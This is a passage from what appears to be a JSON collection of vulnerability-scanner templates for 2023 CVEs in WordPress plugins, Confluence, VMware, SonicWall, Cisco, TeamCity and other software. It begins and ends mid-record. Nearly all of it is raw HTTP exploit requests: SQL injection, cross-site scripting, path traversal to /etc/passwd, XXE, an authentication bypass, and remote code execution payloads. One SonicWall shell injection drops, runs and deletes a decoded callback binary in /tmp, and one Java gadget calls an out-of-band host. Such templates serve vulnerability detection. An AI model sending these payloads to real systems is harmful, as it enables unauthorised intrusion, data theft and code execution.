die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Processing..."],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \">\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\">","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SonicWall Universal Management Appliance","SonicWall Universal Management Host"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4151","info":{"name":"Store Locator WordPress < 1.4.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/agile-store-locator"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[""]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email :","XWiki.XWikiUsers[0]","email_checked"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["=5","contains(body, \"Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \">\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\">"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS",""],"condition":"and"}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel",""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\">"],"matchers-condition":"and","matchers":[{"type":"word","words":["","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"]>\">&test;falsefalsenonecmis:none1000\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 